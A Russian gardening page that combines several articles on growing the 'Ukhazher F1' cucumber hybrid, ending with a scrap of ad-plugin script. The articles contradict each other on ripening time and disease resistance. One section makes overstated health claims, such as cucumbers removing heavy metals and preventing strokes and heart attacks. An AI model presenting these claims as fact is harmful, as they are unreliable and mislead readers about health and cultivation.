10 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Огурец ухажер описание сорта фото отзывы

Огурец «Ухажер F1» – вкусный и неприхотливый

Белошипый огурец «Ухажер F1» (см. фото) хорошо подходит для посадки в теплицах и на открытых грядках. Как утверждают отзывы, открытый грунт для него даже преимущественнее, так как сорт опыляется только при помощи пчел. Данный гибридный сорт вывели селекционеры компании «Гавриш» – Шамшина А.В., Портянкин А.Е. и Гавриш С.Ф. Рассмотрим характеристику сорта более подробно.

Описание сорта

Огурцы сорта «Ухажер» относятся к среднеспелым, среднеплетистым растениям. Боковых побегов на растении немного – 2-3, не больше. Листья на кустах крупные, с небольшой волнистостью по краям. Тип цветения и мужской, и женский, то есть смешанный. Так как растение среднеспелое, плоды можно будет собрать через 55-60 дней после появления всходов. На одном узле формируется около 2-3 завязей.

Описание плодов данного сорта следующее:

  • длина – 16-18 см;
  • диаметр – 3,5-4 см;
  • вес – 180-210 г.

На плодах четко выражены крупные бугорки и шипы белого цвета. Форма зеленцов правильная, овальная (см. фото). Огурчики имеют отличный товарный вид и хорошую транспортабельность. Они могут довольно продолжительное время храниться, не теряя своей привлекательности. Вкусовые характеристики сорта – на высоте, причем как в свежем виде, так и в консервированном. Вдобавок ко всему, огурец «Ухажер» крайне болезнеустойчив, ему не страшна мучнистая роса (как настоящая, так и ложная), корневая гниль и огуречная мозаика.

Как посадить огурцы «Ухажер»

Этот гибридный сорт огурцов можно выращивать двумя способами – прямой посадкой семян в грунт либо рассадой. Если посадка будет производиться в теплицах или парниках – то лучше всего прибегнуть к рассадному методу. Так растения вырастут более крепкими и урожайными. Высадка рассады в грунт производится в мае-июне, и только после того, как на ней появятся 2-3 настоящих листа.

Огурцы любят солнечный свет и хорошую почву – супесчаную или суглинисто-перегнойную. Необходимо выбрать для посадок такое место, чтобы растения были максимально защищены от ветра и сквозняков.

Большое внимание должно уделяться и тому, что росло до этого времени на грядках. Самые лучшие предшественники огурцов – бобовые, картофель, томаты или капуста брокколи. Самые худшие – кабачки, баклажаны и тыквы, то есть после этих овощей высаживать огурцы не рекомендуется. Посадки либо дадут плохой урожай, либо подхватят болезни, вирус которых остался в земле после указанных овощных культур.

Как ухаживать за растениями

Поливы должны быть регулярными и обильными, иначе зеленцы приобретут горький привкус. Частота полива должна быть следующей: до начала плодоношения огурцы необходимо поливать каждые два или три дня (в зависимости от погодных условий), а в период роста плодов нужно будет перейти на ежедневный полив. Если дни жаркие и засушливые – поливать требуется 2 раза, утром и вечером.

После того, как высадили огурчики на постоянное место, нужно проводить подкормки. Их частота – один раз в 2-2,5 недели. Лучше всего вносить удобрения совместно с поливом, подобным образом все ценные вещества дойдут до корней в кратчайшие сроки.

Удобрения нужно чередовать: сначала минеральные, затем органические.

Так как этот огурцы сорта «Ухажер F1» подвержены заболеваниям и нападкам вредителей, их требуется периодически обрабатывать. Время обработки:

  • сразу после цветения;
  • приблизительно за месяц до ожидаемого сбора урожая.

За неделю до сбора урожая не нужно производить никаких обработок, так как химикаты могут попасть на плоды.

Положительные качества

Этот сорт зеленцов не просто так заслужил любовь садоводов и огородников. «Ухажер» отлично подходит для употребления в свежем виде, а также для маринования. Так как эти зеленцы не бывают пустотелыми, они хорошо подходят для консервирования: закатки хранятся долго, потому как рассол не проникает внутрь плодов.

Еще одно неоспоримое преимущество в том, что хороший урожай с куста можно получить не только в теплице, но и в открытом грунте – нужно лишь осуществлять своевременный уход. В этом случае урожай можно будет собирать до самых заморозков.

Поздний пчелоопыляемый гибрид огурцов «Ухажер F1»: фото, видео, описание, посадка, характеристика, урожайность, отзывы

«Ухажер» пользуется популярностью среди огородников как один из самых вкусных крупноплодных гибридов отечественной селекции. Он предназначен для теплиц с доступом насекомых и нуждается в качественном пасынковании.

Описание сорта огурца «Ухажер ф1»

Краткий обзор:

«Ухажер F1» — гибрид первого поколения, выведенный селекционерами Всероссийского научно-исследовательского института овощеводства (ФГБНУ ВНИИО) — А.В. Шамшиным, С.Ф. Гавришем и А.Е. Портянкиным. Поставками на рынок семян занимается агрофирма «Гавриш».

По срокам созревания данный огурец классифицируют как среднепоздний. Плодоношение наступает спустя 55-60 дней с момента посева. Несмотря на то, что растения предназначены для выращивания в тепличных условиях, гибрид относится к традиционным опыляемым культурам. Растения индетерминатные со средней плетистостью. Листья большие, окрас – темно-зеленый.

Среди других гибридов, предлагаемых агрофирмой «Гавриш», наибольшим спросом пользуются:

  • «Кураж F1» — тепличный высокоурожайный огурец (период созревания составляет 45-50 дней);
  • «Изумрудные сережкиF1» — индетерминантный сильнорослый гибрид с большим количеством завязей в одном узле (до 10 штук);
  • «Хрустящая грядкаF1» — универсальный корнишон с обильным завязыванием плодов (до 12 в узле) и дружным плодоношением;
  • «ЛилипутF1» — скороспелый гибрид, дающий до 11 кг/кв.м отборных пикулей.

Плоды

Огурцы крупные – по 14-18 см длиной и весом до 200 грамм. Форма плодов – классическая продолговатая, с короткой шейкой и большим количеством бугорков. Кожица темно-зеленая со слабозаметными полосами и выраженной ребристостью. Опушение белое.

Достоинства и недостатки

Преимущества «УхажераF1»:

  • Способность к опылению к других сортов;
  • Крупноплодность;
  • Продолжительное плодоношение;
  • Сохранность плодов в течение месяца после сбора урожая;
  • Привлекательный вид плодов;
  • Высокая урожайность;
  • Относительно небольшая стоимость семян.

Есть у гибрида и свои недостатки:

  • Невозможность выращивать продуктивные растения во втором поколении;
  • Отсутствие партогенеза, существенно затрудняющее выращивание в замкнутом пространстве;
  • Необходимость полноценного формирования куста;
  • Позднее созревание;
  • Не самая высокая устойчивость к болезням.

Применение

Плоды гибрида «Ухажер» подходят для консервации в больших 3-литровых банках, в которых они успешно сохраняют товарный вид в течение 12-24 месяцев. Однако наибольшее количество полезных веществ (витамина С, калия и фосфора) сохраняется при порезке огурцов в овощные салаты или употреблении в свежем виде.

Агротехника и правильное выращивание

«Ухажер» предназначен для культивирования в парниках и стационарных теплицах в небольших домохозяйствах. Посев на рассаду проводят в апреле. Безрассадный посев в теплицу осуществляется в мае, когда температура почва не будет опускаться ниже 14*С.

Растения плохо переносят загущенную посадку, поэтому густота высадки растений не должна превышать 2,5 растения на 1 кв.м.

Сильнорослые растения данного огурца нуждаются в качественном и регулярном пасынковании. Кусты формируют строго в один стебель. Все пасынки и завязи ниже 4-го узла подлежат удалению. Ростовой стебель прищипывают после закручивания на верхнюю перекладину шпалеры.

В остальном уход стандартный:

  • Умеренный полив, предотвращающий пересыхание почвы;
  • Подкормки с чередованием органики и минеральных комплексов до 4 раз за сезон;
  • Рыхление почвы и прополка сорняков.

Болезни и вредители

Гибрид высоко устойчив к таким недугам:

  • Корневая гниль;
  • Мучнистая роса;
  • Пероноспориоз.

Из вредителей наибольшую опасность для «Ухажера» представляют:

  • Паутинный клещ и белокрылка. Для профилактики рекомендуется периодические опрыскивания растения чесночным или луковым настоем;
  • Бахчевая тля. Во избежание распространения данного вредителя следует регулярно удалять сорняки и избегать загущенной посадки;
  • Слизни. В профилактических целях можно замульчировать грядку сосновыми иголками.

Урожайность

Для гибрида характерна обильная отдача плодов. С одного растения снимают по 5-6 кг огурцов. Плодоношение продолжается до октябрьских заморозков.

В каких регионах лучше выращивать?

Огурец «Ухажер» районирован по следующим регионам:

  • Средневолжский;
  • Северо-Кавказский;
  • Центрально-черноземный;
  • Волго-Вятский;
  • Центральный;
  • Северный;
  • Северо-Западный.

Отзывы о сорте от тех, кто сажал

Огородники, у которых на участке присутствует большое количество насекомых, очень довольны «Ухажером». Растения завязывают большоеколичество плодов и плодоносят до осенних заморозков. Вкусовые качества плодов оценивают на 5 из 5.

Отзыв огородника о сортах:

Сортовая характеристика огурца Ухажер

Огурец Ухажер выведен селекционерами как гибрид среднего срока созревания. В 2004 году он был внесен в государственный реестр. Создан для культивирования в тепличных условиях на маленьких предприятиях и садовых участках.

Сортовая характеристика огурца Ухажер

Краткая информация о сорте

  • Плоды и куст: огурцы зеленые, длиной 15-18 см. Куст индетерминантный (неограниченный рост основной плети).
  • Урожайность: 4-6 кг с растения.
  • Устойчивость: к заморозкам и осенним похолоданиям. Устойчив к мучнистой росе, огуречной мозаике и корневой гнили.
  • Распространение: подходит для всех регионов, но в средней полосе и северных регионах культивируют сорт в тепличных условиях, сажают в прогретый грунт.
  • Применение: подходит как для употребления в свежем виде (в салатах), так и для консервирования.
  • Посадка: семенами в открытый грунт и рассадным методом. В почву высаживают в апреле, а на рассаду – в марте-апреле. Схема посадки – 50х50.
  • Почва: суглинисто-перегнойная или супесчаная.
  • Уход: подкормки и полив проводят в три этапа – после высадки, в период бутонизации, во время плодоношения. Формирование куста не требуется.
  • Период созревания: урожай созревает в конце лета. Плодоношение длится до первых заморозков. Возможно хранение огурцов в течение долгого времени.

Характеристика сорта

Согласно описанию сорта огурца Ухажер, растение некапризное, пчелоопыляемое, куст имеет мужские и женские цветы. С момента появления первых всходов до сбора плодов может пройти около 57 дней. Сорт не требует особого ухода.

Описание плодов и куста

Культура сильнорослая, крупная, индетерминантная. Зеленые листья мощные, гладкие. Листовая пазуха формирует от одной до трех завязей.

Описание плода сорта Ухажер: правильной цилиндрической формы, с белыми шипами на крупных буграх. Длина – от 15 до 18 см, в диаметре – 4,5 см. Опушение на огурцах редкое.

Урожайность

С одного растения получают до 6 кг плодов. Ухажер f1 устойчив к переменам погоды, поэтому легко выдерживает осенние перепады температуры и может плодоносить до похолоданий. При правильном уходе количество урожая может увеличиться.

Область применения плодов

Огурец этого сорта отлично подходит и для салатов, и для консервирования. Плоды непустотелые. При консервировании или мариновании они остаются хрустящими, рассол не попадает внутрь огурцов. Закрутки имеют продолжительный срок хранения, и плоды не теряют хрустящих свойств.

Достоинства и недостатки

Характеристика положительных свойств:

  • высокая урожайность;
  • продолжительное плодоношение;
  • товарный вид;
  • длительное хранение;
  • устойчивость к заболеваниям.

У плодов только один особенный недостаток: они усеяны мелкими шипами. Перед употреблением их необходимо тщательно вымыть с щеткой.

Посадка

При появлении третьего листа рассаду можно высаживать

Гибрид можно выращивать как рассадным способом, так и высадкой семян в открытый грунт. Если высаживать культуру в теплицы, то лучше предварительно вырастить сеянцы. В защищенном грунте она будет более крепкой и урожайной.

В открытый грунт рассаду высаживают в конце мая или в начале июня, как только она будет иметь 2-3 настоящих листа.

Семенами в грунт

В середине апреля грунт следует перекопать и выровнять. В мае в почву добавляют перегной и минеральные удобрения. Почву обеззараживают слабым раствором марганцовки и накрывают пленкой темного цвета. Для посадки стоит выбрать теплый день, когда земля прогрета и нет вероятности ночных заморозков.

Семена огурцов Ухажер высевают в лунки не глубже 1,5-2 см. После появления первых всходов грядки прореживают, оставляя только крепкие культуры. Расстояние между растениями не должно быть меньше 25 см.

На рассаду

На рассаду семена высаживают в марте-апреле. Сначала их обеззараживают. Такая обработка поможет обезопасить растение от заболеваний. В подготовленные торфо-перегнойные емкости закладывают по одной семечке. Применение индивидуальных стаканчиков поможет обойтись без пикировки.

Субстрат можно изготовить самостоятельно: для этого берут компост, торф и древесные опилки в соотношении 2:2:1. Семена не закладывают глубоко. Полив выполняют теплой водой и поддерживают температуру 23-25 °C. Для ее повышения и создания парникового эффекта емкости накрывают пленкой. Периодически обеспечивают поступление воздуха к рассаде.

На постоянное место роста рассаду огурцов Ухажер f1 высаживают в мае-июне. Ростки готовы к пересадке, когда имеют 3-4 листа. Место для посадки должно быть хорошо освещаемым и защищенным от ветра.

Ежедневно под куст вливают 3 л воды до стадии появления бутонов. При цветении и плодоношении через каждые 3 дня выливают 6 л под куст. Полив осуществляется в утреннее или вечернее время. Для недопущения размывания земли применяют лейки с распылителями.

Подкормки проводят в три этапа:

  • через пару недель после посадки растения в почву;
  • на стадии формирования бутонов;
  • в фазе плодоношения.

Корневые подкормки выполняют в жаркую погоду, в это время огурцы Ухажер f1 активно вытягивают питательные вещества из грунта. В прохладные дни лучше использовать внекорневые подкормки.

При хорошем уходе можно получить богатый урожай

По характеристикам сорт не сильноветвистый, поэтому куст не требует формирования. Необходимо только прищипнуть под третьим листом завязи и пасынки. Проводят подвязку огурцов: это помогает ухаживать за ними и убирать урожай.

Борьба с болезнями и вредителями

Огурец Ухажер может поражаться такими вредителями:

  • паутинный клещ;
  • тля бахчевая;
  • белокрылка;
  • слизни.

Клещ опутывает растение еле заметной паутиной, а листья из-за него покрываются желтыми точками. Опрыскивание листвы в жаркую погоду – это первое средство против этих вредителей. Также высаживают укроп рядом с культурой: он привлекает божьих коровок, которые любят лакомиться клещами.

Бахчевую тлю убирают настоями лука, чистотела или картофеля. В запущенных случаях применяют химикаты. Для предупреждения заболеваний необходимо поддерживать грядки в чистоте.

С белокрылкой борются ловушками с клеем. От слизней помогает настойка острого перца. Кроме того, в почву вокруг растения закапывают еловую или сосновую хвою.

Отзывы огородников

По отзывам огородников, огурцы сорта Ухажер – некапризная культура, устойчивая к различным заболеваниям. Хорошо она себя показывает и в теплицах, и в открытом грунте. При недостатке полива плоды могут немного горчить в свежем виде.

Огурец «Ухажер f1»: неприхотливый и очень вкусный

Новый среднепоздний, пчелоопыляемый гибридный огурец «Ухажер f1» предназначен для открытого грунта и пленочных теплиц. Главным преимуществом этого сорта является его высокая урожайность. Описание гибридной формы дано оригинатором, которым является компания «Гавриш». Огурец гибридной формы «Ухажер f1» включен в Государственный реестр Российской Федерации и рекомендован для выращивания на садово-огородных участках, в приусадебных и мелких фермерских хозяйствах. Оптимальным является выращивание под пленочным покрытием.

Описание сорта

Огурец «Ухажер f1» представляет собой среднеплетистое растение с зелеными слабоволнистыми листьями и в среднем с двумя боковыми побегами. Растение индетерминантное, сильнорослое, ветвистость средняя, смешанного типа цветения.

Фаза плодоношения наступает примерно через 55-60 дней. В среднем в каждом узле формируется пара завязей. Зеленцы достигают в длину 16-18 см и характеризуются крупнобугорчатой, белошипой поверхностью и цилиндрической формой. В поперечном разрезе каждый зеленец имеет диаметр 3,5-4 см. Средний вес полностью вызревшего зеленца составляет 185-205 г.

Ценность сорта

Гибридная форма «Ухажер f1» получила высокую оценку за вкусовые качества, а также выровненные и привлекательные по форме зеленцы. Кроме того, огурцы этого сорта болезнеустойчивы, не подвержены поражению корневыми гнилями, настоящей и ложной мучнистой росой.

Огурец: выбор сорта (видео)

Правила посадки

Существует всего два вида посадки огурцов «Ухажер f1»: выращивать данную гибридную форму можно как прямым посевом семян, так и посредством рассады. В парниках и теплицах такую овощную культуру практически всегда выращивают посредством рассады. Непосредственно перед посадкой агрономами рекомендуется провести качественное прогревание и замачивание семенного материала.

Для огурцов требуется много тепла и оптимальные показатели влажности. Для того чтобы как можно раньше получить первый и оптимально высокий урожай огурцов этого сорта, производится посадка в теплице. При выращивании огурцов в средней полосе и северных районах самыми благоприятными условиями являются хорошо прогреваемые участки, представленные легкими супесчано-перегнойными или суглинисто-перегнойными грунтами, хорошо защищенными от порывистого ветра.

Лучшими предшественниками для огурцов являются картофель, томаты, цветная капуста и корнеплоды, а также бобовые культуры. Не рекомендуется высаживать огурцы после кабачков и подобных овощных культур. В открытый грунт посадку следует проводить не ранее мая, когда достаточно прогреются грунт и воздух. Непосредственно после посева участок поливать не рекомендуется, так как вода провоцирует вытеснение воздуха, необходимого для прорастания семян.

Особенности выращивания

Сорт «Ухажер f1» относится к числу неприхотливых, а уход должен осуществляться в соответствии с технологией выращивания огурцов:

  1. При выращивании в открытом грунте следует первое время защитить посевы от вероятных возвратных заморозков.
  2. Чтобы предупредить появление в зеленцах горечи, следует проводить регулярные поливы, которые в жаркую и засушливую погоду должны быть более частыми и обильными; до плодоношения огурцы нужно поливать каждые 2-3 дня, а с началом плодоношения рекомендуется перейти на ежедневные оросительные мероприятия с использованием теплой воды.
  3. После высаживания рассады огурцов на постоянное место или через месяц после посева требуется проводить подкормки каждые две недели, совмещая внесение удобрений с поливами. Внесение органических и минеральных удобрений особенно необходимо, если грунт был недостаточно хорошо заправлен перед осуществлением посева семян.
  4. После прореживания также проводятся подкормки и легкое подокучивание, что способствует отрастанию в нижней части стебля придаточной корневой системы.

Огурцы сорта «Ухажер f1» достаточно часто страдают от различных заболеваний и вредителей, вне зависимости от того, выращивается эта овощная культура в открытом грунте и в тепличных условиях. Чтобы провести полноценную защиту растений следует придерживаться следующей схемы:

  • после цветения проводится опрыскивание препаратом «Абига-Пик» или «Ридомил»;
  • хороший эффект достигается использованием комплекса «Оксихом» и «Актеллик»;
  • в июне проводится повторная обработка посадок средствами «Абига-Пик», «Ридомил», «Оксихом» или «Фитоверм»;
  • примерно за три недели до сбора урожая проводится обработка препаратом «Абига-Пик».

При выращивании рекомендуется использовать шпалерный способ, который облегчает уход за растениями, повышает урожайность и снижает риск поражения болезнями или вредителями.

Отзывы огородников

Огурец «Ухажер f1» получил очень высокую оценку овощеводов, а отзывы о данной гибридной форме практически всегда положительные. Огурцы этого сорта прекрасно подходят как для салатов так и для маринования. Зеленцы всегда хрустящие и очень вкусные, а также крайне редко бывают горькими.

Сорт показывает стабильно высокую урожайность не только в теплицах, но и при выращивании на грядах открытого грунта. Сбор урожая осуществляется до заморозков. Огурец «Ухажер f1», действительно, зарекомендовал себя как неприхотливый сорт универсального использования. Поражается болезнями он достаточно редко и легко переносит недостаточно качественный уход.

Как ухаживать за огурцами (видео)

Гибрид огурцов «Ухажер», пригодный для выращивания в неблагоприятных условиях

В мире существует много разных сортов овощей, в том числе — огуречных. Выведенные селекционерами гибриды приспосабливаются к разным климатическим условиям, дают хороший урожай плодов, приятны на вкус, из-за чего популярны среди дачников.

В статье расскажем об одном из них – огурце Ухажер. Чем он хорош, как его вырастить, как ухаживать и о других важных нюансах.

Описание огурцов

Ухажер – среднеранний гибрид, который рекомендуется выращивать в семи регионах России: Средневолжском, Центрально-Черноземном, Центральном, Волго-Вятском, Северо-Кавказском, Северо-Западном и Северном.

Его раннее созревание помогает избежать болезней и негативного влияния насекомых-вредителей.

Отличительные черты

Плоды отличаются от других видов огурцов такими признаками:

  • огурцы покрыты бугорками с белыми шипами;
  • кожица тонкая, ярко-зеленого цвета с белыми полосками;
  • размер крупный: длина от 15 до 18 см, диаметр до 4 см;
  • форма цилиндрическая;
  • вес от 180 до 200 г.

На фото – огурец Ухажер.

Свойства, польза, калорийность

Огурец – диетический продукт, который на 95% состоит из воды, содержит 15 килокалорий в 100 г продукта. В его состав входят витамины, клетчатка, органические кислоты и другие полезные вещества. Наличие большого количества воды в овоще помогает вывести из организма токсины и шлаки, очистить почки, печень от солей тяжелых металлов.

Клетчатка, которая в большом количестве присутствует в плодах, очищает желудок, улучшает работу кишечника. Огурец содержит бета-каротин, магний, калий, цинк, фолиевую кислоту и другие минералы.

На заметку. Постоянный прием в пищу огурцов благоприятно действует на щитовидную железу, препятствует образованию холестериновых бляшек на стенках сосудов, оберегает сердечно-сосудистую систему от инсультов, инфарктов, атеросклероза.

Огурец отлично утоляет жажду, улучшает аппетит, помогает переваривать пищу. Диетический продукт используется в разных рецептах для похудения.

Характеристики гибрида Ухажер

Огурец опыляется пчелами, растет на суглинисто-перегнойных или супесчаных почвах, устойчив к низкой температуре, не требует особого ухода. Период созревания плодов – среднепоздний, от 55 до 60 дней.

Основные характерные особенности Ухажера:

  • корневая система объемная, хорошо поглощает влагу из почвы, достигает 30 см в глубину;
  • куст крупный, невысокий, с мужскими и женскими соцветиями;
  • стебель крепкий, мощный, с плетистостью от 60 см до 1,5 метров;
  • листья крупные, темно-зеленые, гладкие, по краям волнистые; расположены на стебле поочередно;
  • вкус приятный, сладковатый;
  • урожайность высокая – с одного куста собирают до 6 кг, с 1 кв. м до 16 кг огурцов;
  • семена продолговатой формы молочно-кремового цвета.

Как вырастить самостоятельно

Ухажер выращивается двумя способами – рассадой или прямой посадкой в грунт. Растение, которое будет созревать в крытых помещениях, лучше высаживать рассадным методом. В теплых регионах семена сеют в грунт.

Рассадный способ

Перед высаживанием семян на рассаду рекомендуется предварительно прорастить семечки. Тогда растение лучше приживется в земле, и первые всходы появятся быстрее. Подготавливаются семена для рассады такими способами:

  1. Сначала их отбирают и калибруют. Выбрасывают поврежденные, мелкие семена, чтобы рассада выросла равномерно. Чтобы отделить плохие семена от хороших, советуют положить их в соляной раствор (в литре воды растворить две ложки соли) – семена плохого качества всплывут на поверхность.
  2. Затем прогревают. Их засыпают в мешочек из льна или хлопка и кладут на место, куда попадает солнечный свет или на батарею. Прогревают семена несколько дней, регулярно встряхивая мешочек для их перемешивания.
  3. Далее обеззараживают. Семена 20 минут дезинфицируют 1%-ным раствором марганца, и 3%-й перекисью водорода – 10 минут. Помогает в обработке семян раствор борной кислоты – пол чайной ложки растворяют в стакане воды, медный купорос – четверть чайной ложки добавляют в стакан воды. Выдерживают огуречные семечки в одном из этих растворов до трех часов. Рекомендуется использовать фунгициды: «Фитоспорин-М», «Триходермин». Из народных средств применяют сок алоэ, чесночный раствор.
  4. После стимулируют рост растения с помощью замачивания семян в химических препаратах «Гуми», «Эпин-Экстра».

После набухания семена помещают на двое суток во влажную натуральную ткань и заворачивают. Периодически ее смачивают водой, чтобы обеспечить доступ влаги семенам. На рассаду их высаживают в конце марта — начале апреля в торфяные горшочки.

Чтобы избежать подрезки растения, в каждый из них кладут по одному семени. Смесь для будущей рассады готовится самостоятельно из перегноя, торфа, опилок в пропорции 2:2:1.

Сажают семена в горизонтальном положении на небольшую глубину в 3 см или присыпают грунтом толщиной 5 мм. Поливают будущие саженцы теплой водой из опрыскивателя, чтобы она не размыла почву. Температура воздуха не должны быть ниже +23°C.

На заметку. Для повышения температуры и создания парникового эффекта тару с семенами накрывают пленкой, затем регулярно переворачивают, чтобы поступал свежий воздух.

Проросшим семенам необходимы такие условия:

  • температура днем +20°C;
  • вечерняя температура не ниже +16°C;
  • регулярное освещение – 12 часов;
  • постоянное увлажнение.

Чтобы на рассаду постоянно попадал свет, над ней включают осветительные приборы. Еженедельно огурцы поливают теплой водой, которую предварительно отстаивают несколько дней. Когда на растениях появятся по два листка, их пересаживают в отдельные горшочки или стаканчики. Температуру воздуха в помещении снижают на несколько дней до +17°C.

Во второй декаде мая или в первой декаде июня рассаду переносят на постоянное место в грунт. Пересаживают растения, у которых образовалось от трех до четырех листов на расстояние 50х50 см друг от друга в торфяной емкости. Каждое растение поливают 3 л воды.

Справка. Высаживать гибрид лучше на почву, где раньше росли помидоры, лук, капуста. Не рекомендуется посадка на грядки, где росли тыквы или кабачки.

Семенной способ

Участок под посадку огурцов готовят с осени: вскапывают грядки, вносят удобрения. Гибрид любит солнечный свет, поэтому для посадки обеспечивают доступ освещения и защиту от ветра. Располагать грядки лучше с востока на запад, высотой в 30 см.

С наступлением весны, во второй половине апреля, повторяют вскапывания грунта и выравнивают грядки граблями. В середине мая почву удобряют компостом, золой, минеральными удобрениями. Дезинфицируют грунт раствором перманганата калия и накрывают темной пленкой. Сеют огурцы в теплую, солнечную погоду на глубину от 1,5 до 2 см с расстоянием между семенами до 20-25 см.

Выращивание поэтапно и уход

Хороший урожай гибрида Ухажер зависит от правильного ухода – и, в первую очередь, от своевременного полива и внесения подкормок. Рассмотрим эти процедуры подробнее.

Схема полива:

  • до образования бутонов – еженедельно по 3 л воды под каждый куст;
  • на стадии цветения и формировании плодов – каждые 3 дня по 6 л воды.

Воду перед поливом предварительно отстаивают в большой емкости, чтобы она прогрелась. Опрыскивают кусты утром и вечером, затем разрыхляют грунт и вырывают сорную траву. В жаркое время следят, чтобы почва вокруг кустов не покрывалась сухой коркой.

Подкормки гибрида Ухажер проводят:

  • спустя две недели после высадки растений в почву;
  • когда начинает формироваться завязь;
  • при появлении и росте плодов.

В жаркую погоду лучше вносить корневую подкормку, в прохладное время – внекорневую. Для этого используют раствор коровьего навоза или птичьего помета – в 15 л воды добавляют 1 л коровяка, перемешивают и вносят из расчета 4 л удобрения на 1 кв. м посадки огурцов.

Опрыскивают растения раствором из 15 г карбамида, 25 г сульфата калия, 30 г минерального фосфорного удобрения в утренние или вечерние часы. Заменить минеральные удобрения можно золой – она обогащает почву полезными веществами, отпугивает насекомых-вредителей. По мере роста гибрида удаляют пасынки под третьим листом, кусты подвязывают.

Особенности выращивания и возможные трудности

Гибрид Ухажер – неприхотливая овощная культура. Особенности выращивания огурца такие:

  • оберегать посадки на открытом грунте от весенних заморозков;
  • регулярно поливать в жару и засуху, чтобы предупредить появление горечи в плодах;
  • орошать теплой водой до образования завязи через 2-3 дня;
  • подкармливать и удобрять огурцы следует через две недели после высадки на открытый грунт;
  • удалять лишние побеги, окучивать кусты.

Болезни и вредители, характерные для гибрида

Гибрид Ухажер страдает от разных болезней и насекомых-вредителей независимо от того, растет он в теплице или на открытой почве:

  1. Тля бахчевая. Для борьбы культуру обрабатывают настоями картофеля, чеснока, лука, чистотела, смолы деревьев, фунгицидами.
  2. Паутинный клещ. Растение опрыскивают водой при первом появлении на листьях желтых вкраплений, паутины.
  3. Слизни. Добавляют в почву настои из острого перца, сосновую или еловую хвою. Используют нашатырный спирт, химические препараты.
  4. Белокрылка. Помогают клеевые ловушки. В случае необходимости обрабатывают настоем из чеснока или лука.

Ухажер устойчив к таким болезням: корневая гниль, мучнистая роса, огуречная мозаика. В этих случаях гибрид не нуждается в обработке ядохимикатами.

Сбор и применение урожая

Огурцы Ухажер собирают во второй декаде августа. Из-за неравномерного созревания плодов сбор урожая продолжается в сентябре-октябре.

Ухажер – колючий огурец, поэтому срывают его с кустов в перчатках, складывают в ящики, хранят в прохладном месте около месяца.

Плоды подходят для использования в салатах, в свежем виде и консервации. Консервированные или маринованные овощи получаются очень вкусные – рассол не попадает внутрь огурца, кожица остается плотной, хрустящей.

Преимущества и недостатки

У гибрида больше преимуществ, но есть и некоторые минусы.

Преимущества:

  • устойчив ко многим заболеваниям;
  • хорошо хранится и транспортируется;
  • вкусный, сочный, ароматный;
  • не склонен к разветвлению;
  • дает хороший урожай.

Недостатки:

  • длинные, колючие плоды;
  • не размножается из домашних семян.

Отзывы

Приведем для вас некоторые отзывы реальных дачников о гибриде Ухажер. Перед высаживанием того или иного сорта овощей рекомендуем вам всегда знакомиться с комментариями тех, кто уже выращивал их на грядке.

Игорь, г. Калуга: «Первый раз высадил этот гибрид в теплицу. Очень привлекло название Ухажер. Остался доволен урожаем, вкусом. Особенно, когда откупорил банку и съел консервированный огурчик. Особого ухода огурцы не потребовали. Советую всем!».

Анна, пос. Алексеевка: «Вырастила Ухажера на открытой почве. Все мои ожидания оправдались. Овощ не требовал специального ухода – только хорошего полива. Угощала соседей свежими огурцами, которые им очень понравились. Рекомендую для консервирования – огурцы получаются вкусными, хрустящими».

Ирина, г. Старый Оскол: «Ухажер – отличный гибрид. Люблю вкус этого огурца в свежем и консервированном виде. Хороший урожай собираю уже несколько лет подряд. Гибрид не боится гнили, что очень важно. Главное, вовремя поливать растениe».

Заключение

Гибрид Ухажер – огурец, который не требует специального ухода, растет в холодном и теплом климате, устойчив к разным заболеваниям. Кроме этого, он — прекрасный диетический продукт. Соблюдайте основные правила агротехники, не забывайте о профилактике, и тогда Ухажер порадует вас обильным и вкусным урожаем!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
